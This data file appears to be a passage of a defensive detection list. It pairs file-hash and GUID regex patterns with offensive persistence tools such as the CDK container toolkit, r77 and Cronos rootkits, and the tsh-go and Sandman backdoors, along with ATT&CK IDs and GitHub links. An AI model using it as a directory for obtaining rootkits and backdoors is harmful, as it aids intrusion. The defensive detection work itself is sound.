738*5ffd93d97e56861c46c562585d50dc820200763e633052b6a6d1e53566822cf8*.{0,1000}5ffd93d97e56861c46c562585d50dc820200763e633052b6a6d1e53566822cf8.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z27682
739*6112fed1a30fcd45861afdbd13a6888f5cbeb6c3711d8262d6248eb4941aa2da*.{0,1000}6112fed1a30fcd45861afdbd13a6888f5cbeb6c3711d8262d6248eb4941aa2da.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z27741
740*635640f232a519c71fbdd148bfef9ef8f9c61909106f2d458273fa07830b21ea*.{0,1000}635640f232a519c71fbdd148bfef9ef8f9c61909106f2d458273fa07830b21ea.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z27899
741*63688c4f211155c76f2948ba21ebaf83*.{0,1000}63688c4f211155c76f2948ba21ebaf83.{0,1000}offensive_tool_keywordABPTTSTCP tunneling over HTTP/HTTPS for web application serversT1071.001 - T1573TA0003 - TA0011N/AN/APersistencehttps://github.com/nccgroup/ABPTTS10N/AN/A987351512016-08-12T19:36:24Z2016-07-29T21:45:57Z27906
742*63a6bad64de560056ed496b6b7103056e4bdaf19f49011120997a5b87d141940*.{0,1000}63a6bad64de560056ed496b6b7103056e4bdaf19f49011120997a5b87d141940.{0,1000}offensive_tool_keywordOffice-PersistenceUse powershell to test Office-based persistence methodsT1059.001 - T1137 - T1116TA0003 N/AN/APersistencehttps://github.com/3gstudent/Office-Persistence10#filehashN/A9176242021-04-17T01:39:13Z2017-07-14T10:03:35Z27921
743*643ad690-5c85-4b12-af42-2d31d11657a1*.{0,1000}643ad690\-5c85\-4b12\-af42\-2d31d11657a1.{0,1000}offensive_tool_keywordSunderWindows rootkit designed to work with BYOVD exploitsT1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/ColeHouston/Sunder10#GUIDprojectN/A102183202025-01-18T10:41:50Z2025-01-10T03:57:05Z27964
744*64b40a70b232b7e23a187a11c52ef8d8b7f3e16a5b869af16b390cbbe4aab935*.{0,1000}64b40a70b232b7e23a187a11c52ef8d8b7f3e16a5b869af16b390cbbe4aab935.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z27999
745*64c86a12800b8d5064e7313a43eb6f5504a7043ab15c227cecfddaf84cc74ced*.{0,1000}64c86a12800b8d5064e7313a43eb6f5504a7043ab15c227cecfddaf84cc74ced.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z28002
746*66504e8c044a01ed3ef2a97dd36de68b7b1913d737d6ad4e6bd7778d80dec92f*.{0,1000}66504e8c044a01ed3ef2a97dd36de68b7b1913d737d6ad4e6bd7778d80dec92f.{0,1000}offensive_tool_keywordSharpHideTool to create hidden registry keysT1112 - T1562 - T1562.001TA0005 - TA0003N/AN/APersistencehttps://github.com/outflanknl/SharpHide10#filehashN/A95480962019-10-23T10:44:22Z2019-10-20T14:25:47Z28112
747*66f1e5e9916366d406955233a55d5bcff573c46a06c2424de65bc71adf6629fc*.{0,1000}66f1e5e9916366d406955233a55d5bcff573c46a06c2424de65bc71adf6629fc.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z28153
748*67544c3753cabf093153fc9fadf25640e8ab4fec6ce16ae37844b505c232fd72*.{0,1000}67544c3753cabf093153fc9fadf25640e8ab4fec6ce16ae37844b505c232fd72.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z28172
749*67e7e9e8a9ae97ff4a2f1878746be4c10af64f43867d2e9ead31470145c689b8*.{0,1000}67e7e9e8a9ae97ff4a2f1878746be4c10af64f43867d2e9ead31470145c689b8.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z28206
750*68080b2cbfd4488f96e0c315ea7e8bf6204de010a05eeb2da621f78caa7254b9*.{0,1000}68080b2cbfd4488f96e0c315ea7e8bf6204de010a05eeb2da621f78caa7254b9.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z28212
751*68a231b29bc22ff2f956bbfc0215f5c74880da394ddd484144a8ef1013c696d1*.{0,1000}68a231b29bc22ff2f956bbfc0215f5c74880da394ddd484144a8ef1013c696d1.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z28241
752*697320ded8b271c975f6ff97a43eb7bc444cbe8648b8c5f34aa7652e14893306*.{0,1000}697320ded8b271c975f6ff97a43eb7bc444cbe8648b8c5f34aa7652e14893306.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z28295
753*6bd11a9b68e81660518ccc9888cf6ea1f2d85c5bb33857f543298c2386e07bdf*.{0,1000}6bd11a9b68e81660518ccc9888cf6ea1f2d85c5bb33857f543298c2386e07bdf.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z28436
754*6bfc3e0664e6aab7d6925ad1c191c75bc1f1f5b4dd4f8c073c5eef063ec92de7*.{0,1000}6bfc3e0664e6aab7d6925ad1c191c75bc1f1f5b4dd4f8c073c5eef063ec92de7.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z28445
755*6c78751a2dd30be8fcb962a93ab912d335a56a7a722dc502bf55eb4c2c7e7c8e*.{0,1000}6c78751a2dd30be8fcb962a93ab912d335a56a7a722dc502bf55eb4c2c7e7c8e.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go10#filehashN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z28485
756*6da016cefca0a050afb4c3dbf5e07f1af4fe69b24f1be45e56444fef537fd2b3*.{0,1000}6da016cefca0a050afb4c3dbf5e07f1af4fe69b24f1be45e56444fef537fd2b3.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z28564
757*6e0055eba5cf62d9ac7b129e55d3f230fef2dd432d88313ae08d85d9ff5c2329*.{0,1000}6e0055eba5cf62d9ac7b129e55d3f230fef2dd432d88313ae08d85d9ff5c2329.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10#filehashN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z28591
758*6e24ebb4b88122fe10261cb8cf32f92c812690c49aea29f2d708557ea5feb186*.{0,1000}6e24ebb4b88122fe10261cb8cf32f92c812690c49aea29f2d708557ea5feb186.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z28602
759*6efb691f0411b0e57b39c9efae1a55033cb8d5de3911d1ed120bf8787f395f1f*.{0,1000}6efb691f0411b0e57b39c9efae1a55033cb8d5de3911d1ed120bf8787f395f1f.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z28659
760*6f7949ffcf1b9bce2ab2301e6a75a4ba8690ea3434b74bd6c3ba0e9aca6d5d04*.{0,1000}6f7949ffcf1b9bce2ab2301e6a75a4ba8690ea3434b74bd6c3ba0e9aca6d5d04.{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit10#filehashN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z28695
761*6ff0ec2a775575ab2724c254aa386c44155453c1ae020446a6fb5b0535de65d3*.{0,1000}6ff0ec2a775575ab2724c254aa386c44155453c1ae020446a6fb5b0535de65d3.{0,1000}offensive_tool_keywordSharpHideTool to create hidden registry keysT1112 - T1562 - T1562.001TA0005 - TA0003N/AN/APersistencehttps://github.com/outflanknl/SharpHide10#filehashN/A95480962019-10-23T10:44:22Z2019-10-20T14:25:47Z28725
762*70c104eb31780222a3a882a3728cafeeb308d8ff718a5c9ce62778d579b3de86*.{0,1000}70c104eb31780222a3a882a3728cafeeb308d8ff718a5c9ce62778d579b3de86.{0,1000}offensive_tool_keywordSchTask_0x727create hidden scheduled tasksT1053TA0005 - TA0003N/AN/APersistencehttps://github.com/0x727/SchTask_0x72710#filehashN/A1065321122021-09-01T01:34:51Z2021-08-30T03:29:34Z28781
763*7271AFD1-10F6-4589-95B7-3ABF98E7B2CA*.{0,1000}7271AFD1\-10F6\-4589\-95B7\-3ABF98E7B2CA.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#GUIDprojectN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z28909
764*72ce22f23461dffa813c1a36c37ae081664ee255cbaf0e4b87d5108ab3101df2*.{0,1000}72ce22f23461dffa813c1a36c37ae081664ee255cbaf0e4b87d5108ab3101df2.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z28931
765*72f7e33c5313aa5ab15b99778b1f3c4d50d4710b171a635994d0d01e47e8173b*.{0,1000}72f7e33c5313aa5ab15b99778b1f3c4d50d4710b171a635994d0d01e47e8173b.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z28947
766*73fc266095e6d582b79db226145d0990129ad72c584863a61f3bd0e8056a0435*.{0,1000}73fc266095e6d582b79db226145d0990129ad72c584863a61f3bd0e8056a0435.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z29012
767*74f0a367e0af7a5885ece4682a8e1a07945893090ecf8c9677310954c7d9c479*.{0,1000}74f0a367e0af7a5885ece4682a8e1a07945893090ecf8c9677310954c7d9c479.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10#filehashN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z29077
768*752c9bc83cd57649bece5f5885d921fa0dfd8cb62df66b6db1df281e51cdb560*.{0,1000}752c9bc83cd57649bece5f5885d921fa0dfd8cb62df66b6db1df281e51cdb560.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z29094
769*762df2cf658c629e22e2f30827bd2b42de41749e2a387635db41849911641121*.{0,1000}762df2cf658c629e22e2f30827bd2b42de41749e2a387635db41849911641121.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z29159
770*770e9e98e3ed07a224cbaf8fb78c5c9804b580f04470884cead4413616200621*.{0,1000}770e9e98e3ed07a224cbaf8fb78c5c9804b580f04470884cead4413616200621.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z29213
771*78012b117e06baee37f32962d1dbd603b02231d7c4117c577765ecbc245842d6*.{0,1000}78012b117e06baee37f32962d1dbd603b02231d7c4117c577765ecbc245842d6.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z29287
772*7806b81514ecc44219a6f6193b15b23aea0a947f3c91b339332bea1445745596*.{0,1000}7806b81514ecc44219a6f6193b15b23aea0a947f3c91b339332bea1445745596.{0,1000}offensive_tool_keywordSharPersistSharPersist Windows persistence toolkit written in C#.T1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/fireeye/SharPersist10#filehashN/A101014602572023-08-11T00:52:09Z2019-06-21T13:32:14Z29288
773*784859b081e3bacd1c8c8a72374618f567cad2978835e241d9cc586c27c6d00e*.{0,1000}784859b081e3bacd1c8c8a72374618f567cad2978835e241d9cc586c27c6d00e.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z29308
774*78BB6D02-6E02-4933-89DC-4AD8EE0B303F*.{0,1000}78BB6D02\-6E02\-4933\-89DC\-4AD8EE0B303F.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#GUIDprojectN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z29341
775*7a9a81c7ef99897281466ea06c14886335cf8d4c835f15aeb1e3a2c7c1d0e760*.{0,1000}7a9a81c7ef99897281466ea06c14886335cf8d4c835f15aeb1e3a2c7c1d0e760.{0,1000}offensive_tool_keywordAMSI-ProviderA fake AMSI Provider which can be used for persistenceT1546.013 - T1574.012TA0005 - TA0003N/AN/APersistencehttps://github.com/netbiosX/AMSI-Provider10#filehashN/A102150162021-05-16T16:56:15Z2021-05-15T16:18:47Z29485
776*7aa2f4a66d72adefd632e15dee392cbeab0a843a4890598a9610660897b398f1*.{0,1000}7aa2f4a66d72adefd632e15dee392cbeab0a843a4890598a9610660897b398f1.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z29488
777*7abda12808ebda750211656c4a931ca9794121b42d2a0be50dee43b9fcc84718*.{0,1000}7abda12808ebda750211656c4a931ca9794121b42d2a0be50dee43b9fcc84718.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z29495
778*7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ*.{0,1000}7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ.{0,1000}offensive_tool_keywordPowerlurkPowerLurk is a PowerShell toolset for building malicious WMI Event SubsriptionsT1084 - T1059.001 - T1546.003 - T1053.005TA0003 - TA0005 - TA0002 - TA0006N/AN/APersistencehttps://github.com/Sw4mpf0x/PowerLurk10N/AN/A104384722016-07-25T22:19:22Z2016-07-13T20:07:25Z29518
779*7B4D3810-4A77-44A1-8546-779ACF02D083*.{0,1000}7B4D3810\-4A77\-44A1\-8546\-779ACF02D083.{0,1000}offensive_tool_keywordSharpEventPersistPersistence by writing/reading shellcode from Event LogT1055 - T1070.001 - T1547.001TA0003 - TA0005N/AN/APersistencehttps://github.com/improsec/SharpEventPersist10#GUIDprojectN/A1010371502022-05-27T14:52:02Z2022-05-20T14:52:56Z29533
780*7c48363688227e6857b0dec52273b450e3fbb108fbb5ca643265ba79ee1598c6*.{0,1000}7c48363688227e6857b0dec52273b450e3fbb108fbb5ca643265ba79ee1598c6.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z29596
781*7cd720218d9cf22a1143274f4904f30bcef18bfc00ebb54de45bedfeb12d1535*.{0,1000}7cd720218d9cf22a1143274f4904f30bcef18bfc00ebb54de45bedfeb12d1535.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#filehash #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z29640
782*7fe4d08596fc13f16ed9bc29345a09a153e7e006bad88289836092bfc0e1ff1d*.{0,1000}7fe4d08596fc13f16ed9bc29345a09a153e7e006bad88289836092bfc0e1ff1d.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z29853
783*802cc16a8b00b49fbc1685cdfa652fabe7b53d5d0e1fe1a1da4ab0da59ec263f*.{0,1000}802cc16a8b00b49fbc1685cdfa652fabe7b53d5d0e1fe1a1da4ab0da59ec263f.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z29892
784*811683b1-e01c-4ef8-82d1-aa08293d3e7c*.{0,1000}811683b1\-e01c\-4ef8\-82d1\-aa08293d3e7c.{0,1000}offensive_tool_keywordWSAAcceptBackdoorWinsock accept() Backdoor ImplantT1574.001 - T1059 - T1213 - T1105 - T1546TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/EgeBalci/WSAAcceptBackdoor10#GUIDprojectN/A102112232021-02-13T19:18:41Z2021-02-13T15:59:01Z29958
785*81c3f4341d0cecc16beaae19c88e54dda2730a4eaf06cc0fea0119822d7482c3*.{0,1000}81c3f4341d0cecc16beaae19c88e54dda2730a4eaf06cc0fea0119822d7482c3.{0,1000}offensive_tool_keywordPowerlurkPowerLurk is a PowerShell toolset for building malicious WMI Event SubsriptionsT1084 - T1059.001 - T1546.003 - T1053.005TA0003 - TA0005 - TA0002 - TA0006N/AN/APersistencehttps://github.com/Sw4mpf0x/PowerLurk10#filehashN/A104384722016-07-25T22:19:22Z2016-07-13T20:07:25Z30002
786*81f14b29b131156c433a46709e83bbe8deeee87c4bb9db4d45171ece944f6612*.{0,1000}81f14b29b131156c433a46709e83bbe8deeee87c4bb9db4d45171ece944f6612.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#filehashN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z30017
787*825790dbcdf9b7a69b9a566f71bc167a0a8353e735390c5815b247ac58efa817*.{0,1000}825790dbcdf9b7a69b9a566f71bc167a0a8353e735390c5815b247ac58efa817.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z30042
788*828aede9a7bc193899b66e8c10ac10d24398cf79575e771d9a970d3f9a4cdd92*.{0,1000}828aede9a7bc193899b66e8c10ac10d24398cf79575e771d9a970d3f9a4cdd92.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z30055
789*8432665ec509b2c4d2f2cac0ac44d543cf9991357071e3c0323e3b7e7741b038*.{0,1000}8432665ec509b2c4d2f2cac0ac44d543cf9991357071e3c0323e3b7e7741b038.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z30173
790*86492637e46635ef72b4660016c2b3fdbb4c581b5f8dec1b6dc2dd8c04031e93*.{0,1000}86492637e46635ef72b4660016c2b3fdbb4c581b5f8dec1b6dc2dd8c04031e93.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z30301
791*86F8C733-F773-4AD8-9282-3F99953261FD*.{0,1000}86F8C733\-F773\-4AD8\-9282\-3F99953261FD.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#GUIDprojectN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z30344
792*8822c7fa386065eace366042536dcbc277a5be58efae8ce02bf9e4c583e07918*.{0,1000}8822c7fa386065eace366042536dcbc277a5be58efae8ce02bf9e4c583e07918.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go10#filehashN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z30439
793*8861dd060f4b09113d6b8b10c213472d0ac3fe0f654724ec90fb5398ddf890e3*.{0,1000}8861dd060f4b09113d6b8b10c213472d0ac3fe0f654724ec90fb5398ddf890e3.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z30454
794*8880e4d7caf33e5da9a785d4c2da5bdcc6ba6315f882900f88c0adf1872e8fb8*.{0,1000}8880e4d7caf33e5da9a785d4c2da5bdcc6ba6315f882900f88c0adf1872e8fb8.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z30468
795*8956389a7a50dcf4b7ab221c1b91172e7f7fb298dbf43a8251abfb76334e7a4e*.{0,1000}8956389a7a50dcf4b7ab221c1b91172e7f7fb298dbf43a8251abfb76334e7a4e.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z30525
796*896b8d804debd233200375a5b7c1218d5b8bf5f53aaaa685b9d411c0770e27d4*.{0,1000}896b8d804debd233200375a5b7c1218d5b8bf5f53aaaa685b9d411c0770e27d4.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z30531
